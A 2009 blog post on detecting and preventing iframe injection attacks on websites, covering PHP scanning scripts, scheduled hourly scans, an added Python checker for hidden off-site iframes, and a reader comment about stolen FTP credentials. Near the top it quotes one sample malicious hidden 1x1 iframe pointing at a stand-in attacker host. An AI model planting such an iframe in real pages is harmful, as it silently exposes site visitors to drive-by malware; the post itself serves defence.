Tuesday, October 13, 2009

Measures to Prevent and Detect iFrame Injection Attacks

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. The following is an example of a malicious iframe injection code:

<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>

The iframe tag is an HTML tag used to seamlessly embed content from another page or site. (The “i” in “iframe” stands for “invisible”, i.e. “invisible frame”.) IFrames are used on thousands and thousands of sites, because that’s what Google uses for its AdSense ads — the little bit of JavaScript you paste on your page eventually ends up inserting an iframe into the HTML of your page.

Like most useful things, iFrames can be used for good or for bad.

An iframe injection is an injection of one or more iframe tags into a page’s content. The iframe typically does something bad, such as downloading an executable application that contains a virus or worm in it… something that compromises a visitor’s system.

Typically, all the index.* files on your server are infected with a piece of code that loads a hidden iframe in the page. Examples of these pages are:


The intent of this article is to show what measures you can use to prevent or detect iframe injection attacks on your website.


The first thing you need to do is to check with Google to see if your site is listed as suspicious. You can do this by using the following link:


Before you use the link, you need to replace "yourdomain_name" with your actual website name.

Google will tell you if your website is suspicious or not.

You can also go to the following website and enter your "www.yourdomain_name/". It will advise you on your website status.



If you have suffered an iframe injection attack you need to act fast. If the security of your website is compromised, it can affect the search engine rankings of your website. Besides, it may pave the way for more sophisticated attacks. Google will mark your site in its search results with a warning: “This site may harm your computer”. If a visitor sees the message “This site may harm your computer” pop up when (s)he tries to access your website/blog, (s)he may not return again and your traffic will go down to zero.

I suggest that you read the article "Website Protection Against iFrame Injections" which you can find in this Blog.


If you have not suffered an iframe injection attack, then you can manually run some scripts which will test the index.* files on your website.

One script you can use is called "clean.php" which you can download at:


Copy and paste this script into your text editor, such as Notepad, and save the file as "clean.php".

When you create a web page, it is important to use a pure text editor such as Notepad or an editor designed for creating web pages. Never use Word or another word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can cause problems on web servers. Also, when you save the web page, ensure that it has the proper file extension, e.g., index.html, clean.php, etc.

Before you can use the file, you need to change the following line in the script:

$webpath = "Type your domain name here. Eg:http://www.diovo.com/";

which will become:

$webpath = "http://www.yourdomain_name/";

Where "yourdomain_name" is replaced with your actual domain name.

In the script, the "s" parameter specifies the file name to search for and the "c" parameter specifies the text to search for inside the file.

When you have pasted the above script into your Notepad editor and made the change for your website name, save it as “clean.php”. Once you have saved the file, upload it to the root directory of your website.

Now you need to create a URL that you will copy and paste into your browser as follows:


where "yourdomain_name" is replaced by your actual domain name.

The web page to be checked is given by “s=index.php” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.php injections.

Since we also want to check our index.html type web pages, we create a different URL as follows:


The file to be checked is given by “s=index.html” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.html injections.

The URL will list all the "index.php" or "index.html" files on your website and, if any of the files contains the given string, it will print the part of the file containing the string. An infected file is therefore easy to recognize: the printed fragment contains the iframe script.

Note that the script will not remove the iframes from your files. Automated cleaning could break some of your web pages, so you will have to clean the files manually by deleting the iframe script.

You should be able to see that you can use the “s” parameter to test any web page on your website for iframe injection. Simply put in the exact webpage as follows:


You can thus create simple internet URL shortcuts that you can click on to check the required web pages.

When the script tests for iframe injections, it is simply looking for the text "iframe", so it will display any web page that contains that text. You need to ensure that the iframe being displayed is actually a malicious iframe, similar to the example shown previously. Sometimes it may be a legitimate iframe. Be absolutely sure before you delete it from your web page.
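The scripts described above only match the text "iframe", so the reviewer has to tell a hidden, injected frame (like the example at the top of this article) apart from a legitimate embed. The following is an added example, not code from the article or from the clean.php script, showing how to parse every iframe out of a page and list the indicators that match the malicious pattern: an off-site src, a 1x1 frame and an inline style that hides it. The sample HTML and the SITE_HOST value are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page, not taken from any real site. The first iframe is a
# normal same-site embed; the second is the hidden 1x1 pattern from the article.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="/widgets/calendar.html" width="400" height="300"></iframe>
<p>Contact us</p>
<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
</body></html>"""

SITE_HOST = "www.yourdomain_name"  # assumed: the host your own pages are served from


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attrs is a list of (name, value); value is None for bare attributes
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for a width/height of 0 or 1 pixels (accepts '1', '1px', ' 1 ')."""
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


def suspicious_reasons(attrs, site_host=SITE_HOST):
    """Return the indicators from the article's malicious pattern that match.

    An empty list means none matched; the reader still decides, as the article
    says, whether the remaining embed is legitimate.
    """
    reasons = []
    src = attrs.get("src", "")
    host = urlparse(src).hostname  # None for relative URLs such as /widgets/x.html
    if host and host.lower() != site_host.lower():
        reasons.append("src points off-site: " + host)
    if _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", "")):
        reasons.append("1x1 or smaller frame")
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden by inline style")
    return reasons


def find_iframes(html, site_host=SITE_HOST):
    """Return (src, reasons) for every iframe in the document, in page order."""
    parser = IframeCollector()
    parser.feed(html)
    return [(f.get("src", ""), suspicious_reasons(f, site_host)) for f in parser.iframes]


if __name__ == "__main__":
    for src, reasons in find_iframes(SAMPLE_HTML):
        verdict = "SUSPICIOUS" if reasons else "looks legitimate"
        print(f"{verdict}: {src} {reasons}")
```

An off-site src on its own is a weak signal, since legitimate third-party embeds such as ad frames also point elsewhere; it is the combination with a 1x1 size or a hiding style that matches the injection pattern, so read the whole list of reasons before deleting anything.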

The "clean.php" iframe injection tool is quite useful when testing individual pages. However, as your website grows you will need a separate URL for every web page or file extension, and checking each individual web page for iframe injection becomes a time consuming effort.

A website that gives a free script to test all the files on a website for iframe injection is given at the following link:


The file is called "detect-signature.php".

When you have downloaded the file, there are a couple of lines in the script that I suggest you change. This will help make the script more suitable for your website.

Using your notepad editor, open the file. First locate the following line:

define('IGNORE_EXTENSIONS',"jpg pdf zip psd doc gif swf xls"); // Ignore files of these types

You will see that the script ignores files with the extensions jpg, pdf, zip, etc. You can add or delete extensions as you feel necessary.

Next, locate the following line:

define("IGNORE_BEFORE", strtotime('2009-08-01') );

The script will ignore any web page last modified before August 1, 2009. You may want to change this to ensure all your website files are tested. You could simply change 2009 to 2008.

You will be downloading the “detect-signature.php” as a zip file. After download, extract the file. Using the notepad editor, open the file and change the suggested lines to what suits your needs and re-save. Upload the file to the root directory of your website.

To activate, you need to create the following URL for your domain:


You can either create a URL short cut or else copy and paste the URL into your browser. Put in your exact domain name for “yourdomain_name”.

When the file is activated, it initially starts by checking every file and web page on your website, unless you have excluded it.

Once the scan is complete, you have two more options for scanning for iframe injection. You can either have the scan stop at the first error (iframe injection) or have it display all errors (all files and web pages with iframe injection). The scan results page offers links for all three modes, which you can click at any time.

When you do find iframe injections, you need to evaluate if the iframe injection is of the malicious form as indicated previously. If it is, you need to remove it from your web page. Open up your web page with a notepad editor if you have entered your site via FTP, find the iframe injection, delete it and re-save your web page. If you have a complete up-to-date backup of your web page, you can just upload it to your website. It will over-write the web page with the iframe injection.

What I like about this file is that it can check every web page on your website. Although the primary intent is to check all the index.* web pages, checking your other web pages is an added benefit as they might also be attacked. Just make sure that whenever you do find an iframe injection, it is really a malicious iframe.


Having the ability to manually check for iframe injections goes a long way in helping keep your website secure. The final step now is to automate the iframe scanning in case you forget. This will be your constant watch dog.

The best way to do this is to schedule the iframe scanning, say every hour. A nice free System Scheduler can be found at:


Once you have downloaded the System Scheduler, install it. We will schedule the file "detect-signature.php" on your website to run a scan every hour. As mentioned previously, there are three ways to run the file: check and display all files, stop at the first error, or display only the errors. An error is an iframe injection. We will use the third option, so we will need to use the following URL in the System Scheduler:


When the file runs, it will show any iframe infected files. If you see errors, you need to take immediate action.

We will now schedule the file. Open System Scheduler. Select the "Action" menu and then select "New Event". You should now be in the Event dialog box. For Event type you can leave "Run Application". Give the event a title such as "iFrame Injection Scan". In the Application box, input the complete URL to display errors only, with your actual domain name. In "Working Dir" put any directory on your computer. In the "State" box, select Maximized.

We now need to schedule when we want to run the scan. Select the "Schedule" tab. For "Schedule Type", select "Every Hour / Selected Minutes". In the left bottom boxes, select "Every Hour" and "On The Hour". This means the scan will run, e.g. at 1:00 pm, 2:00 pm, 3:00 pm, etc., for the daily 24 hour time frame. Now go to the "Action" menu and Save and Exit. You should see the System Scheduler icon in your right bottom tool bar. This icon must always be displayed in order for the event to run.

Every hour on the hour, your web page will be activated and your website scanned for iframe injections. Look over the results and take action if necessary, otherwise close the web page. If you do not close the page, you will see multiple web pages of the same thing. You simply need to look them over and close them. If you are running the scan constantly over night, you will see the multiple web pages in the morning.

You do not have to run every hour on the hour. You can select what ever time schedule you prefer. If you have been attacked, I strongly recommend you stay with hourly scanning.

To make things a bit clearer, I added the date and time to the "detect-signature.php" output so I knew the exact date and time the scan was made. You can search the internet for JavaScript that you can add. It is very easy to do and will give order to your scanning.


If you follow all the measures stated in this document, you will prevent your website from becoming a victim of iframe injection attacks. It is also important to note that your website may not be the only victim. Your home PC may also be a victim. You must also have preventative measures on your PC. Make sure you read the article "Website Protection Against iFrame Injections" as mentioned previously. This is a must.

Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.

1 comment:

  1. I had a massive iframe insertion attack on many of my websites yesterday.
    All attacks originated from IP and used ftp access to the various servers.

    After careful inspection I discovered that only those sites were hacked that had "Save Pwd" checked in WS_FTP. So someone seems to have stolen my:
    C:\Program Files\WS_FTP\WS_FTP.ini
    which contains all saved passwords in a simply decodable unsafe format.

    It is still a miracle how the hacker got access to that file. I have ESET Smart Security and it sees nothing suspicious.

    NEVER use the "Save Pwd" option in WS_FTP, uninstall WS_FTP and use a secure ftp client instead.